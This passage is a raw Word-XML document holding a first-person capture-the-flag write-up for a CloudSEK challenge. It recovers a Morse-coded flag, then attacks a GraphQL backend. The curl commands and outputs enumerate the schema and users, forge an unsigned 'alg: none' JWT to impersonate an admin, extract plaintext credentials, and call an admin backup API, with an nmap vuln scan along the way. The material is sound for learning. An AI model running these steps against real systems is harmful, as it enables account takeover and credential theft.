          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="11"/>
          <w:rFonts w:hint="default" w:ascii="SimSun" w:hAnsi="SimSun" w:eastAsia="SimSun" w:cs="SimSun"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="6384290" cy="3023870"/>
            <wp:effectExtent l="0" t="0" r="3810" b="11430"/>
            <wp:docPr id="10" name="Picture 10" descr="Screenshot 2025-08-26 00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26 0026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default" w:ascii="SimSun" w:hAnsi="SimSun" w:eastAsia="SimSun" w:cs="SimSun"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="11"/>
          <w:rFonts w:hint="default" w:ascii="SimSun" w:hAnsi="SimSun" w:eastAsia="SimSun" w:cs="SimSun"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="11"/>
          <w:rFonts w:hint="default" w:ascii="SimSun" w:hAnsi="SimSun" w:eastAsia="SimSun" w:cs="SimSun"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="11"/>
          <w:rFonts w:hint="default" w:ascii="SimSun" w:hAnsi="SimSun" w:eastAsia="SimSun" w:cs="SimSun"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5256530" cy="2381250"/>
            <wp:effectExtent l="0" t="0" r="1270" b="6350"/>
            <wp:docPr id="11" name="Picture 11" descr="Screenshot 2025-08-26 00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26 0027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C7A4">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rStyle w:val="11"/>
          <w:rFonts w:hint="default" w:ascii="SimSun" w:hAnsi="SimSun" w:eastAsia="SimSun" w:cs="SimSun"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7395F232">
      <w:pPr>
        <w:pStyle w:val="10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On playing the file, it consisted only of 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short and long beeping sounds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, which strongly suggested it was encoded in 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Morse code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. The audio was extracted and processed through a Morse code decoding tool.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sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Flag discovered:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> CloudSEK{FLAG2!W3!H473!AI!B07S}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB77CDA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  <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5405755" cy="2879725"/>
            <wp:effectExtent l="0" t="0" r="4445" b="3175"/>
            <wp:docPr id="12" name="Picture 12" descr="Screenshot 2025-08-26 00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26 0056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F9B4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1909D009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5B2901B0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2C100A0C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20CC5BF0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6F16D0B6">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:shd w:val="clear" w:fill="212529"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:line="12" w:lineRule="atLeast"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="sans-serif" w:hAnsi="sans-serif" w:eastAsia="sans-serif" w:cs="sans-serif"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="DEE2E6"/>
          <w:spacing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DEE2E6"/>
          <w:spacing w:val="20"/>
          <w:shd w:val="clear" w:fill="212529"/>
        </w:rPr>
        <w:t>Attacking the Infrastructure - Flag 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E25AAF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2727A1DF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3EE300C1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3FEEAE64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36134C22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71135" cy="2984500"/>
            <wp:effectExtent l="0" t="0" r="1206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3815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16AB2716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3996F86E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The Telegram bot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 second link led to a BeVigil report for the app (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="7"/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com.strikebank.easycalculator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), which exposed a backend </w:t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GraphQL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 endpoint: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  <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5260975" cy="2664460"/>
            <wp:effectExtent l="0" t="0" r="9525" b="2540"/>
            <wp:docPr id="14" name="Picture 14" descr="Screenshot 2025-08-26 01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26 0149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B61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40DD51AD">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rStyle w:val="11"/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 w14:paraId="1EE06BBA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We began by visiting (https://bevigil.com/report/com.strikebank.easycalculator), which provided insights into the Calculator app’s APK. Static analysis revealed sensitive information, including a BASE\_URL (http://15.206.47.5:9090) and GraphQL endpoints (/graphql, /graphql/flag, /graphql/notes). To investigate further, an Nmap scan was run on the host 15.206.47.5, which exposed:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A51CE0A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22/tcp → SSH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7875E9EB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5000/tcp → Flask/Werkzeug (Python app)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C0C79C1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9090/tcp → Gunicorn (GraphQL backend)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22FE56FE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 xml:space="preserve">Since port 9090 hosted the GraphQL API, it was identified as the primary attack </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36680DBE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surface for exploitation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C9A215D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</w:p>
    <w:p w14:paraId="18946280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bookmarkStart w:id="0" w:name="_GoBack"/>
    </w:p>
    <w:bookmarkEnd w:id="0"/>
    <w:p w14:paraId="59EB64EB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11825" cy="1403985"/>
            <wp:effectExtent l="0" t="0" r="3175" b="5715"/>
            <wp:docPr id="15" name="Picture 15" descr="Screenshot 2025-08-26 01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26 0156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36D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</w:p>
    <w:p w14:paraId="5DECC575">
      <w:pPr>
        <w:spacing w:line="24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630545" cy="1908175"/>
            <wp:effectExtent l="0" t="0" r="8255" b="9525"/>
            <wp:docPr id="16" name="Picture 16" descr="Screenshot 2025-08-26 01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26 0152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66D">
      <w:pPr>
        <w:pStyle w:val="4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Direct Query Attempt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EF3DD88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 first tried to query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flag</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> field directly from the GraphQL endpoint:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41083F91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curl -sX POST -H "Content-Type: application/json" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="689BD8B1">
      <w:pPr>
        <w:pStyle w:val="8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--data '{"query":"{ flag }"}' http://15.206.47.5:9090/graphql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="557621E0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server responded with:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E23BA14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Cannot query field 'flag' on type 'Query'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4739B1FD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</w:p>
    <w:p w14:paraId="1C7C503F">
      <w:pPr>
        <w:pStyle w:val="8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Schema Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A2BFE0E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 then performed GraphQL introspection to enumerate available queries:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24266C72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curl -sX POST -H "Content-Type: application/json" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C326694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--data '{"query":"query{__schema{queryType{fields{name}}}}"}' \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00BBEA39">
      <w:pPr>
        <w:pStyle w:val="8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http://15.206.47.5:9090/graphql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="689BA369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Discovered fields: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Style w:val="7"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>showSchema, listUsers, userDetail, getMail, getNotes, getPhone, generateToken, databaseData, dontTrythis, BackupCodes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C5EDC46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Next, I used the </w:t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t>showSchema</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> query to dump the full schema:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B008736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curl -sX POST -H "Content-Type: application/json" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D695E58">
      <w:pPr>
        <w:pStyle w:val="8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--data '{"query":"{ showSchema }"}' http://15.206.47.5:9090/graphql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="718D3ECD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 schema revealed that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userDetail</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> contains a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flag</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> field.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 w14:paraId="6C036567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Enumerating Users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="463F4630">
      <w:pPr>
        <w:pStyle w:val="10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To find interesting accounts:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A5A10B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curl -sX POST -H "Content-Type: application/json" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CEB8351">
      <w:pPr>
        <w:pStyle w:val="8"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto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--data '{"query":"{ listUsers { id username } }"}' \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6598867E">
      <w:pPr>
        <w:pStyle w:val="8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http://15.206.47.5:9090/graphql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E79AF9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Response included several users, among them:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2814D0E8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id: R2W8K5Z, username: r00tus3r</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24BF95C4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account looked privileged and likely contained the flag.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 w14:paraId="6F21B1D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Token Generation and Weakness</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E51E958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Next, I generated a token using the built-in function:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="235ADE7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curl -sX POST -H "Content-Type: application/json" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69D1E1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--data '{"query":"{ generateToken }"}' \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60923B9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http://15.206.47.5:9090/graphql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="024E4967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Returned JWT:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F47481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eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJpZCI6Ilg5TDdBMlEiLCJ1c2VybmFtZSI6ImpvaG4uZCJ9.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="766B4D37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Header analysis showed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"alg": "none"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, meaning the token was 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unsigned</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> and could be modified freely.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 w14:paraId="17B9B5D8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Forging the Token</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A3032D2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 modified the JWT payload to impersonate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r00tus3r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45E72BA4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{ "id": "R2W8K5Z", "username": "r00tus3r" }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A4F6A86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Base64-encoded header + payload (with no signature):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE173EF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eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJpZCI6IlIyVzhLNVoiLCJ1c2VybmFtZSI6InIwMHR1czNyIn0.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08212E8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45EB8E0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58876C1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Retrieving the Flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="362067D5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Using the forged token in the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Authorization</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> header:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1428C52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curl -sX POST -H "Content-Type: application/json" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="630D323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-H "Authorization: Bearer eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJpZCI6IlIyVzhLNVoiLCJ1c2VybmFtZSI6InIwMHR1czNyIn0." \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DB0128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--data '{"query":"{ userDetail(id:\"R2W8K5Z\"){ flag } }"}' \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B2BF82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 xml:space="preserve">  http://15.206.47.5:9090/graphql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01B571CF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Response:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ABF042B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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>CloudSEK{Flag_3_gr4phq1_!$_fun}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="266DE223">
      <w:pPr>
        <w:pStyle w:val="10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336030" cy="3359785"/>
            <wp:effectExtent l="0" t="0" r="1270" b="5715"/>
            <wp:docPr id="18" name="Picture 18" descr="VirtualBox_kali-linux-2024.1-virtualbox-amd64_26_08_2025_02_04_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VirtualBox_kali-linux-2024.1-virtualbox-amd64_26_08_2025_02_04_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69AB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569F48A0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4B6E1A70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  <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="6357620" cy="3632200"/>
            <wp:effectExtent l="0" t="0" r="5080" b="0"/>
            <wp:docPr id="19" name="Picture 19" descr="VirtualBox_kali-linux-2024.1-virtualbox-amd64_26_08_2025_02_05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VirtualBox_kali-linux-2024.1-virtualbox-amd64_26_08_2025_02_05_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4575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3F2C16C4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070FDC08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648E5939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392DD822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6AEAB538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4F37EA4A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2F25DF4F">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:shd w:val="clear" w:fill="212529"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:line="12" w:lineRule="atLeast"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="sans-serif" w:hAnsi="sans-serif" w:eastAsia="sans-serif" w:cs="sans-serif"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="DEE2E6"/>
          <w:spacing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DEE2E6"/>
          <w:spacing w:val="20"/>
          <w:shd w:val="clear" w:fill="212529"/>
        </w:rPr>
        <w:t>Bypassing Authentication - Flag 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A9B42CE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29AFD607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3DE6C8F5">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rStyle w:val="11"/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139628F9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71770" cy="3602990"/>
            <wp:effectExtent l="0" t="0" r="11430" b="3810"/>
            <wp:docPr id="21" name="Picture 21" descr="Screenshot 2025-08-26 022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26 0224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F98B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A20B15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Recon </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E63318F">
      <w:pPr>
        <w:pStyle w:val="10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Using the previously obtained forged JWT (from Flag 3), a query was made to extract stored credentials of the privileged user </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="7"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>r00tus3r</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C581F4">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:ind w:left="720"/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>curl -s -X POST \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12886964">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:ind w:left="720"/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-H "Content-Type: application/json" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C197417">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:ind w:left="720"/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-H "Authorization: Bearer &lt;forged_token&gt;" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ABEB493">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:ind w:left="720"/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--data '{"query":"{ userDetail(id: \"R2W8K5Z\") { credentials { username password } } }"}' \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61ACB294">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:ind w:left="720"/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 xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "http://15.206.47.5:9090/graphql" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="9"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>http://15.206.47.5:9090/graphql</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4813B568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/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="8779510" cy="1080135"/>
            <wp:effectExtent l="0" t="0" r="8890" b="12065"/>
            <wp:docPr id="22" name="Picture 22" descr="VirtualBox_kali-linux-2024.1-virtualbox-amd64_26_08_2025_02_39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VirtualBox_kali-linux-2024.1-virtualbox-amd64_26_08_2025_02_39_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79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97F2">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>Response leaked plaintext credentials:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F177DC4">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/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</w:rPr>
        <w:t>username: r00tus3r</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB02245">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/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</w:rPr>
        <w:t>password: l3t%27s%20go%20guys$25</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B8D7C7F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7FAD859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fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "http://15.206.47.5:5000/login" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="9"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>http://15.206.47.5:5000/login</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F5661B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65470" cy="2844165"/>
            <wp:effectExtent l="0" t="0" r="11430" b="635"/>
            <wp:docPr id="24" name="Picture 24" descr="Screenshot 2025-08-26 03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8-26 0302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162F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E427981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2CD7CF1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I logged in using credential next step was to find the backup code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C3C804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E61CCA9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57800" cy="2637155"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="25" name="Picture 25" descr="Screenshot 2025-08-26 03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8-26 0303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9521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EFB7E2A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Ran an </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="11"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Nmap scan</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> against the target:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="111389EB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nmap -Pn --script vuln -p 21,22,554,1723,5000,9090 15.206.47.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E013FF">
      <w:pPr>
        <w:pStyle w:val="10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Open services discovered:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18464875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21/tcp   open  ftp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B39468B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22/tcp   open  ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B9BC948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5000/tcp open  upnp (web service / API endpoint)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AAF9378">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:bidi w:val="0"/>
        <w:ind w:left="720"/>
        <w:jc w:val="left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9090/tcp open  graphql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0985BC4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57FE61A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API Interaction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A1BA9DD">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing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service on port </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="11"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>5000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> exposed </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="7"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>/api/admin/backup/generate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DCEE7AA">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing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Initial attempts with numeric user IDs failed (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="7"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>{"error":"Invalid user_id"}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14D399D9">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing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On inspection, the API expected a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="11"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>UUID string</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> instead of numeric IDs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="196DEC7F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curl -X POST -H "Content-Type: application/json" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E83CE33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 xml:space="preserve">  -H "Authorization: Basic YXBpLWFkbWluOkFwaU9ubHlCYXNpY1Rva2Vu" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D17BC83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 xml:space="preserve">  --data '{"user_id": "f2f96855-8c05-4599-a98c-f7f2fd718fa2"}' \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03FA7B59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 xml:space="preserve">  http://15.206.47.5:5000/api/admin/backup/generate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="276BBF39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Successful response leaked </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="11"/>
